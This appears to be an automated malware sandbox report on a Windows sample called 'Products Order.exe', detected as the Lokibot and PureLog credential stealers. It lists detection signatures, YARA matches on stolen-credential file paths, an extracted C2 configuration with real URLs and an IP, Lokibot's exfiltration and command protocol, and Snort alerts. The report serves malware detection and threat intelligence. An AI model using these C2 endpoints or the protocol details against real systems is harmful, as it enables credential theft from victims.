Edit tour

Windows Analysis Report
Products Order.exe

Overview

General Information

Sample name:	Products Order.exe
Analysis ID:	1442315
MD5:	ab09f11ddb556069549717cc1f37fdc1
SHA1:	e4cba5e88d12df5f9b0eb1dab978b48d63f6b57b
SHA256:	6946d0d3322995d1c4a8f407b8a627e37644dcc4ddef07b97167f9a4e57b0ee1
Tags:	exeLoki
Infos:

Detection

Lokibot, PureLog Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Snort IDS alert for network traffic

Yara detected Lokibot

Yara detected PureLog Stealer

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

.NET source code contains very large strings

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Initial sample is a PE file and has a suspicious name

Injects a PE file into a foreign processes

Machine Learning detection for sample

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Tries to steal Mail credentials (via file registry)

Writes to foreign memory regions

Yara detected aPLib compressed binary

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: AspNetCompiler Execution

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

Products Order.exe (PID: 3436 cmdline: "C:\Users\user\Desktop\Products Order.exe" MD5: AB09F11DDB556069549717CC1F37FDC1)

aspnet_compiler.exe (PID: 5352 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" MD5: FDA8C8F2A4E100AFB14C13DFCBCAB2D2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Loki Password Stealer (PWS), LokiBot	"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2	SWEED The Gorgon Group Cobalt	http://blog.reversing.xyz/reversing/2021/06/08/lokibot.html http://reversing.fun/posts/2021/06/08/lokibot.html http://reversing.fun/reversing/2021/06/08/lokibot.html http://www.malware-traffic-analysis.net/2017/06/12/index.html https://blog.fortinet.com/2017/05/17/new-loki-variant-being-spread-via-pdf-file	https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "45.90.57.51/big/five/fre.php"]}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
Products Order.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.1969470285.0000000012AA6000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000000.00000002.1969470285.0000000012AA6000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000002.1969470285.0000000012AA6000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1969470285.0000000012AA6000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x178c0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000000.00000002.1969470285.0000000012AA6000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x4c8b:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000000.00000002.1969470285.0000000012AA6000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x134cf:$des3: 68 03 66 00 00 0x178c0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x1798c:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000000.00000000.1960275029.00000000004B6000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
00000002.00000002.3204897255.0000000000778000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security
00000000.00000002.1967088480.0000000002A2D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000000.00000002.1967088480.0000000002A2D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000002.1967088480.0000000002A2D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1967088480.0000000002A2D000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x120900:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000000.00000002.1967088480.0000000002A2D000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x10dc9b:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000000.00000002.1967088480.0000000002A2D000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x11c4df:$des3: 68 03 66 00 00 0x120900:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x1209cc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
Process Memory Space: Products Order.exe PID: 3436	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: Products Order.exe PID: 3436	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: Products Order.exe PID: 3436	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x4b420:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk 0x6237a:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Process Memory Space: aspnet_compiler.exe PID: 5352	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: aspnet_compiler.exe PID: 5352	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: aspnet_compiler.exe PID: 5352	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security
Process Memory Space: aspnet_compiler.exe PID: 5352	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x23d9:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Click to see the 24 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.Products Order.exe.12aa64d0.2.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0.2.Products Order.exe.12aa64d0.2.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.Products Order.exe.12aa64d0.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Products Order.exe.12aa64d0.2.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.Products Order.exe.12aa64d0.2.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.Products Order.exe.12aa64d0.2.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
0.2.Products Order.exe.12aa64d0.2.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.Products Order.exe.12aa64d0.2.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
2.2.aspnet_compiler.exe.400000.1.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
2.2.aspnet_compiler.exe.400000.1.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
2.2.aspnet_compiler.exe.400000.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.aspnet_compiler.exe.400000.1.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
2.2.aspnet_compiler.exe.400000.1.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
2.2.aspnet_compiler.exe.400000.1.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
2.2.aspnet_compiler.exe.400000.1.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
2.2.aspnet_compiler.exe.400000.1.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
2.2.aspnet_compiler.exe.400000.1.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
2.2.aspnet_compiler.exe.400000.1.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
2.2.aspnet_compiler.exe.400000.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.aspnet_compiler.exe.400000.1.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
2.2.aspnet_compiler.exe.400000.1.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
2.2.aspnet_compiler.exe.400000.1.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
2.2.aspnet_compiler.exe.400000.1.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
2.2.aspnet_compiler.exe.400000.1.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
0.2.Products Order.exe.12aa64d0.2.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.Products Order.exe.12aa64d0.2.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.Products Order.exe.12aa64d0.2.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.Products Order.exe.12aa64d0.2.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
0.2.Products Order.exe.12aa64d0.2.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.0.Products Order.exe.430000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Click to see the 25 entries

Sigma Signatures

System Summary

Sigma detected: AspNetCompiler Execution

Source: Process started

Author: frack113: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ParentCommandLine: "C:\Users\user\Desktop\Products Order.exe", ParentImage: C:\Users\user\Desktop\Products Order.exe, ParentProcessId: 3436, ParentProcessName: Products Order.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", ProcessId: 5352, ProcessName: aspnet_compiler.exe

Snort Signatures

ET TROJAN LokiBot Fake 404 Response - Source IP: 45.90.57.51 - Destination IP: 192.168.2.5

Timestamp:	05/16/24-00:37:53.617485
SID:	2025483
Source Port:	80
Destination Port:	49744
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:12.750490
SID:	2024318
Source Port:	49755
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:35.693093
SID:	2825766
Source Port:	49766
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 45.90.57.51 - Destination IP: 192.168.2.5

Timestamp:	05/16/24-00:37:01.238713
SID:	2025483
Source Port:	80
Destination Port:	49709
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:00.746100
SID:	2024313
Source Port:	49709
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:08.955748
SID:	2021641
Source Port:	49752
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:37.577907
SID:	2021641
Source Port:	49767
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:36:54.264582
SID:	2825766
Source Port:	49705
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:43.623424
SID:	2025381
Source Port:	49738
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:00.746100
SID:	2024318
Source Port:	49709
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 45.90.57.51 - Destination IP: 192.168.2.5

Timestamp:	05/16/24-00:36:57.478820
SID:	2025483
Source Port:	80
Destination Port:	49707
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:07.254938
SID:	2024313
Source Port:	49712
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:41.744488
SID:	2024318
Source Port:	49737
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:36:55.076784
SID:	2021641
Source Port:	49706
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:50.123310
SID:	2024318
Source Port:	49773
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:07.254938
SID:	2024318
Source Port:	49712
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:41.744488
SID:	2024313
Source Port:	49737
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:12.990169
SID:	2025381
Source Port:	49723
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:33.315004
SID:	2825766
Source Port:	49733
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:01.356159
SID:	2825766
Source Port:	49748
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 45.90.57.51 - Destination IP: 192.168.2.5

Timestamp:	05/16/24-00:38:01.857131
SID:	2025483
Source Port:	80
Destination Port:	49748
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:07.071740
SID:	2825766
Source Port:	49751
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:50.123310
SID:	2024313
Source Port:	49773
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:43.272420
SID:	2021641
Source Port:	49770
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:12.750490
SID:	2024313
Source Port:	49755
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:23.884685
SID:	2025381
Source Port:	49728
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 45.90.57.51 - Destination IP: 192.168.2.5

Timestamp:	05/16/24-00:37:57.604255
SID:	2025483
Source Port:	80
Destination Port:	49746
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:36:54.264582
SID:	2025381
Source Port:	49705
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 45.90.57.51 - Destination IP: 192.168.2.5

Timestamp:	05/16/24-00:37:47.955066
SID:	2025483
Source Port:	80
Destination Port:	49740
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 45.90.57.51 - Destination IP: 192.168.2.5

Timestamp:	05/16/24-00:37:49.847441
SID:	2025483
Source Port:	80
Destination Port:	49742
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:03.239293
SID:	2021641
Source Port:	49749
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:55.010656
SID:	2024313
Source Port:	49745
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:29.556038
SID:	2025381
Source Port:	49731
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:45.530428
SID:	2021641
Source Port:	49739
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

